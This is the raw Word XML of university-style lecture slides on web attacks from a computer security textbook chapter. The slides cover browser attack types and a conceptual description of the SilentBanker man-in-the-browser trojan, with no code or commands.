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3.410644531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1065673828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="941.8000030517578" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="108"/>
          <w:szCs w:val="108"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="108"/>
          <w:szCs w:val="108"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY 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02587890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="936.3999938964844" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="108"/>
          <w:szCs w:val="108"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="108"/>
          <w:szCs w:val="108"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COMPUTING,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02587890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="981.7943572998047" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="108.04000091552734"/>
          <w:szCs w:val="108.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="108.04000091552734"/>
          <w:szCs w:val="108.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FIFTH EDITION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737060546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="910" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="57576e"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="57576e"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 4: The Web—User Side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6.223144531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7.3091888427734"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Module 3 Web Attacks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40" w:lineRule="auto"/>
        <w:ind w:left="554.3199920654297"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Attacks against browsers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6494140625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="554.3199920654297"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Attacks against and from web sites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40" w:lineRule="auto"/>
        <w:ind w:left="554.3199920654297"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Attacks seeking sensitive data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40" w:lineRule="auto"/>
        <w:ind w:left="554.3199920654297"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Attacks through email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3.64135742187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8.109588623046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Browser attacks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87.8850269317627" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="2979.259033203125" w:firstLine="13.896026611328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Browser is software with a relatively simple role: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connect to a particular web address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9775390625" w:line="271.8911933898926" w:lineRule="auto"/>
        <w:ind w:left="548.0799865722656" w:right="3225.2587890625" w:firstLine="2.424011230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fetch and display content from that address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transmit data from a user to that address Security issues for browsers arise from several  complications such as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76904296875" w:line="239.87059593200684" w:lineRule="auto"/>
        <w:ind w:left="831.7599487304688" w:right="1097.40966796875" w:hanging="268.57437133789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84000015258789"/>
          <w:szCs w:val="40.8400001525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A browser often connects to more than the one address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shown in the browser‘s address bar.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60498046875" w:line="239.90398406982422" w:lineRule="auto"/>
        <w:ind w:left="548.0799865722656" w:right="657.7392578125" w:firstLine="6.24000549316406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Fetching data can impose accesses to numerous  locations to obtain pictures, audio content, and other linked  content.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4320220947266"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3.64135742187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4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8.109588623046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Browser attacks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37.7599334716797" w:right="433.82080078125" w:hanging="271.007919311523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Browser software can be malicious or can be corrupted to  acquire malicious functionality.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6904296875" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="1027.199935913086" w:right="383.02001953125" w:hanging="260.44792175292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Popular browsers support add-ins, extra code to add new  features to the browser, but these add-ins themselves can  include corrupting code.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96976470947" w:lineRule="auto"/>
        <w:ind w:left="1052.6399993896484" w:right="1104.859619140625" w:hanging="285.8879852294922"/>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Data display involves a rich command set that controls  rendering, positioning, motion, layering, and even  invisibility.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99462890625" w:line="239.98735427856445" w:lineRule="auto"/>
        <w:ind w:left="1048.3199310302734" w:right="882.61962890625" w:hanging="281.5679168701172"/>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browser can access any data on a user‘s computer  (subject to access control restrictions); generally the  browser runs with the same privileges as the user.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6521606445312" w:line="239.90396976470947" w:lineRule="auto"/>
        <w:ind w:left="1027.199935913086" w:right="466.4599609375" w:hanging="260.44792175292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Data transfers to and from the user are invisible, meaning  they occur without the user‘s knowledge or explicit  permission.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201446533203"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3.64135742187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5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8.109588623046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sectPr>
          <w:pgSz w:h="10800" w:w="14400" w:orient="landscape"/>
          <w:pgMar w:bottom="147.2000026702881" w:top="112.80029296875" w:left="335.12001037597656" w:right="226.10107421875" w:header="0" w:footer="720"/>
          <w:pgNumType w:start="1"/>
        </w:sect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Browser attacks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27392578125" w:line="239.90389823913574"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Browsers connect users to outside networks, but few  users can monitor the actual data transmitted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398406982422"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Many web interactions start at site A but then connect  automatically to sites B, C, and D, often without the user‘s  knowledge, much less permission, once data arrive at site  A, the user has no control over what A does.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99462890625" w:line="199.92000102996826"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Ways to attack browser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4012451171875" w:line="239.9040412902832"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Go after the operating system so it will impede the  browser‘s correct and secure functioning.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99462890625" w:line="239.90396976470947"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Tackle the browser or one of its components, add-ons, or  plug-ins so its activity is altered.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14721679688" w:line="454.65147972106934"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Noto Sans Symbols" w:cs="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols"/>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Intercept or modify communication to or from the browser. </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4000244140625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"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Browser Vulnerabilities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69921875"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1000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3115234375"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900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6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5157470703125"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sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:h="10800" w:w="14400" w:orient="landscape"/>
          <w:pgMar w:bottom="147.2000026702881" w:top="112.80029296875" w:left="866.3701629638672" w:right="2099.742431640625" w:header="0" w:footer="720"/>
          <w:cols w:equalWidth="0" w:num="2">
            <w:col w:space="0" w:w="5720"/>
            <w:col w:space="0" w:w="5720"/>
          </w:cols>
        </w:sect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897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765869140625" w:line="256.2568187713623"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800 700 600 500 400 300 200 100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208 207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7178344726562"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441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30810546875"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731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30810546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="46.54239273071289"/>
          <w:szCs w:val="46.54239273071289"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:h="10800" w:w="14400" w:orient="landscape"/>
          <w:pgMar w:bottom="147.2000026702881" w:top="112.80029296875" w:left="1052.9910278320312" w:right="1520.06591796875" w:header="0" w:footer="720"/>
          <w:cols w:equalWidth="0" w:num="5">
            <w:col w:space="0" w:w="2380"/>
            <w:col w:space="0" w:w="2380"/>
            <w:col w:space="0" w:w="2380"/>
            <w:col w:space="0" w:w="2380"/>
            <w:col w:space="0" w:w="2380"/>
          </w:cols>
        </w:sectPr>
      </w:pP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727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98388671875" w:line="389.67275619506836"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Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="77.57065455118816"/>
          <w:szCs w:val="77.57065455118816"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="superscript"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="46.54239273071289"/>
          <w:szCs w:val="46.54239273071289"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2008 2009 2010 2011 2012 2013 </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3.64135742187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7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8.109588623046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Browser Attack Types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330322265625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="561.3159942626953" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="61.20000076293945"/>
          <w:szCs w:val="61.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72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Man-in-the-browser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6005859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="561.3159942626953" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="61.20000076293945"/>
          <w:szCs w:val="61.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72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystroke logger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6005859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="561.3159942626953" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="61.20000076293945"/>
          <w:szCs w:val="61.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72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Page-in-the-middle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6005859375" w:line="287.88479804992676" w:lineRule="auto"/>
        <w:ind w:left="561.3372039794922" w:right="3138.460693359375" w:hanging="0.021209716796875"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="72.04000091552734"/>
          <w:szCs w:val="72.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="61.20000076293945"/>
          <w:szCs w:val="61.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72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program download substitution </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="61.2400016784668"/>
          <w:szCs w:val="61.2400016784668"/>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72.04000091552734"/>
          <w:szCs w:val="72.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User-in-the-middle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70581054687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3.64135742187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8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7.3091888427734"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Man-in-the-Browser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36.0799407958984" w:right="1121.57958984375" w:hanging="285.575942993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man-in-the-browser attack is an example of malicious  code that has infected a browser.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51.89916610717773" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="957.66113281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Code inserted into the browser can read, copy, and  redistribute anything the user enters in a browser.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threat here is that the attacker will intercept and  reuse credentials to access financial accounts and other  sensitive data.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416015625" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="844.7199249267578" w:right="1641.739501953125" w:hanging="294.215927124023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Trojan horse that intercepts data passing through the  browser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0320434570312"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4000244140625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"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Man-in-the-Browser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405029296875" w:line="250.01561164855957" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="48.95092010498047"/>
          <w:szCs w:val="48.95092010498047"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="subscript"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User types </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser encrypts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1635131835938" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SilentBanker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7374267578125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">intercepts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9</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6.4508056640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypted data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2529296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">transferred to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65771484375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29.37055206298828"/>
          <w:szCs w:val="29.37055206298828"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bank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1821899414062" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22.754127502441406"/>
          <w:szCs w:val="22.754127502441406"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:h="10800" w:w="14400" w:orient="landscape"/>
          <w:pgMar w:bottom="147.2000026702881" w:top="112.80029296875" w:left="922.42919921875" w:right="2109.249267578125" w:header="0" w:footer="720"/>
          <w:cols w:equalWidth="0" w:num="2">
            <w:col w:space="0" w:w="5700"/>
            <w:col w:space="0" w:w="5700"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:cs="Times" w:eastAsia="Times" w:hAnsi="Times"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22.754127502441406"/>
          <w:szCs w:val="22.754127502441406"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BANK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10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7.3091888427734"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Man-in-the-Browser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3330078125" w:line="239.68616008758545" w:lineRule="auto"/>
        <w:ind w:left="832.2939300537109" w:right="1415.8349609375" w:hanging="283.5707092285156"/>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Code linked to a victim‘s browser as an add-on or browser  helper object; in some versions it listed itself as a plug-in to  display video. As a helper object,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01025390625" w:line="239.68605995178223" w:lineRule="auto"/>
        <w:ind w:left="823.0455780029297" w:right="681.436767578125" w:hanging="274.3223571777344"/>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It set itself to intercept internal browser calls, including those to  receive data from the keyboard, send data to a URL, generate  or import a cryptographic key, read a file (including display that  file on the screen), or connect to a site;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2918701171875" w:line="239.86762046813965" w:lineRule="auto"/>
        <w:ind w:left="842.4231719970703" w:right="1371.25244140625" w:hanging="293.699951171875"/>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SilentBanker started with a list of over 400 URLs of popular  banks throughout the world.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96240234375" w:line="239.68608856201172" w:lineRule="auto"/>
